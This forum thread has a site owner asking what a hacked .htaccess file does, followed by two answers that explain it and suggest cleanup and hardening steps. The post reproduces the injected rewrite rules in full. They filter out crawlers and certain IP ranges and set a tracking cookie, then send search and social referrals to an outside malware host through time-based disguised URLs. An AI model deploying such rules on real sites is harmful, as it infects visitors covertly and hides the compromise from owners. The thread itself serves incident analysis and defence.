Client site's htaccess hacked - not entirely sure what this does or what to do from here

Question

One of our clients sites has been hacked and the .htaccess files replaced with the following.

Can anyone break down exactly what this is doing?

From my knowledge it looks like it's taking the referral page, then the user agent, it sets a cookie called jpg and then redirects you to siknsty.malicioussite.com which then attempts to download some malware before referring you back to the original referrers site (So your path is Google > Malware Page > Google)

If the jpg cookie is set it doesn't refer you anywhere as it assumes that you have already had the malware downloaded. (this may be wrong - I think it should refer you to the pages listed below where it redirects).

I'm not sure about the rest or if it uses .htaccess to mask zip files as jpgs (I think I'm reading that right)...

Any ideas anyone?

Also, any ideas how it came into being on the server? Permissions for all were set to 0644, and this has occurred on both Windows and Linux servers under the same account.

Wednesday morning ballache ahoy.

Oh and don't go to that site.

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?        (tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*Jpg.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC]
RewriteCond %{HTTPS}        ^off$
RewriteRule .* - [E=Jpg:%{TIME_SEC}]
RewriteRule .* - [E=HjT:siknsty.autoeventregistration.com]

RewriteCond %{ENV:Jpg} 0
RewriteRule ^.* http://%{ENV:HjT}/lg.php?bannerid=2168&campaignid=1049&zoneid=54&loc=1&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=3dc202f6d9  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9516:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 1
RewriteRule ^.* http://%{ENV:HjT}/www/app_full_proxy.php?app=275724075798066&v=1&size=z&cksum=e086bd606215518aed83711368bbecf5&src=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11607:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 2
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.3&utms=10&utmn=620248474&utmhn=malang.olx.co.id&utme=8(2!entryPage)9(2!jobs/staticsearch/190\%3Fsearchbox\%3Dretailer\%26section\%3Dst-190)11(2!1)&utmcs=UTF-8&utmsr=1024x768&utmvp=1024x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Gambar\%20MAZDA\%20MR\%20TAHUN\%201992.\%20BIRU\%20-\%20Malang\%20-\%20Mobil&utmhid=312516024&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=vehicles/itemimages/withImg/0&utmac=UA-1240664-1&utmcc=__utma\%3D209359949.1036501994.1340939688.1340939688.1340955051.2\%3B\%2B__utmz\%3D209359949.1340955051.2.2.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dgambar\%2520mobil\%2520mazda\%2520th\%25201992\%3B&utmu=ujGgAAAAIAAAAAAAAAAAAAB~  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9398:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 3
RewriteRule ^.* http://%{ENV:HjT}/_xhr/ugccomments/?method=get_context_uuid&context_id=8064b73e-890d-3876-9ce5-c5f7c98574aa&0.2617028157370842&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9127:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 4
RewriteRule ^.* http://%{ENV:HjT}/ping?h=thefrisky.com&p=/photos/357-12-stars-who-regret-having-plastic-surgery/lisa-rinna-lips-m-jpg-2/&u=i5r1cquurwfzcui1&d=thefrisky.com&g=25328&n=1&f=1&c=0&x=114&y=1865&w=638&j=45&R=1&W=0&I=0&E=0&v=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=4187&t=72n4jkji2m79sf6m&V=6&D=nygdmayh2yyvp9w3&i=12\%20Stars\%20Who\%20Regret\%20Having\%20Plastic\%20Surgery\%20Lisa\%20Rinna\%20\%E2\%80\%93\%20The\%20Frisky&_  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11948:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 5
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.2&utms=3&utmn=490784565&utmhn=www.wego.co.id&utme=8(2!Hotels*Google\%20search\%20position)9(2!Details\%20Overview*5)&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x612&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.2\%20r202&utmdt=Aston\%20Cengkareng\%20City\%20Hotel\%20\%26\%20Conference\%20Center\%2C\%20Jakarta\%20-\%20Bandingkan\%20tarif\%20kamar\%20-\%20Wego.co.id&utmhid=1324439502&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/hotel/indonesia/jakarta/aston-cengkareng-city-hotel-and-conference-center--133090&utmac=UA-29994605-1&utmcc=__utma\%3D1.786375144.1340094774.1340094774.1340094774.1\%3B\%2B__utmz\%3D1.1340094774.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dstandard\%2520superior\%2520twin\%2520room\%2520aston\%2520hotel\%3B&utmu=qzGggCAAAAAAAAAAAAAAAAB~  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10955:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 6
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=30550&campaignid=4402&zoneid=1917&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=dbd1f7d293  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9621:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 7
RewriteRule ^.* http://%{ENV:HjT}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/fly_high/v03/c013/37.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10798:/:0:HttpOnly]
RewriteCond %{ENV:Jpg} 8
RewriteRule ^.* http://%{ENV:HjT}/pingjs/?k=f6ckilz7r2ss&t=Komik\%20Fairy\%20Tail\%20\%7C\%20Chapter\%20288\%20289\%20Hal\%2016\%20-\%20Baca\%20Manga\%20Bahasa\%20Indonesia\%20Online&c=s&y=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&a=-1&r=978836  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11234:/:0:HttpOnly]
<!-- Conditions 10 - 58 removed to post on stackoverflow -->
RewriteCond %{ENV:Jpg} 59
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=31662&campaignid=2&zoneid=1884&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=af167e7f1f  [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9285:/:0:HttpOnly]

</IfModule>
#a77342b1677255ef6afc9a0dbec166f633c2b44166559458c71fb4e7

Answer 1

It's choosing one of the redirects at random based on the second of the time. Hence why they go from 0 to 59.

I think you are right that it sets a cookie so that it doesn't do the same thing again to the same victim.

The first bunch of rules are doing things such as eliminating everyone who requests a file ending in .jpg, .zip, etc., probably to make sure that it's someone actually looking at a browser before it redirects. The UserAgents are also exclusions (note the ! at the start of each line) - various web spiders plus some operating systems and clients that it's not interested in or can't infect. It also requires the user-agent to include one of

Windows|Macintosh|iPad|iPhone|iPod|Android

and the referrer to be one of a long list of names of popular sites and search engines. This could be again to make sure there's a human behind the browser if they are getting paid to spam or it could be related to using your site for eg click farming.

An interesting thing is the list of IP blocks that it ignores:

RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]

These might include the addresses of the site, so that the site's owners (potentially) don't notice the damage, or it might give you a clue as to what country your attackers are in.

Answer 2

Rather than being a direct/defacing attack, it's a cunning way of silently introducing malware which isn't obvious to the end-user.

It looks like it's cycling randomly based on time... (which you're obviously some way to understanding):

1. Take the site down until you understand it
2. Compare/Restore from the most recent backup and see what else has been changed across your system
3. Check your log files
4. Lock all server-based accounts and cycle all passwords

There are a number of possible ways in which this has happened, including:

1. A server account has been brute-forced (e.g. an ftp/telnet/user or other common account)
2. Your code has provided/created a loophole through which someone has gained access (although if your permissions are set to 644 then they've probably gained root/user account access somehow or they wouldn't be able to overwrite the files).
3. Out of date software (with security hole(s)) has been exploited
4. Piggy-backed on an insecure user account session

Here are a few common elements to help avoid such exploits, although you can find security methodologies on the web to lock down linux/win servers:

• Installing tripwires on key system files (one open source option: http://www.tripwire.org/)
• Installing software/security updates (Secunia is a long-standing source of new issues)
• Removing/stoping all unneeded accounts/services
• Using hardware on the edge of your network to protect your servers from external access (eg. Router with intelligent security features - although this is costly)
• Blocking access to the server from static IP ranges other than those that you use
• Conduct penetration testing to find the weaknesses that your server(s) have and close them
• Remove external access by blocking attempts on accounts after n tries using iptables or an equivalent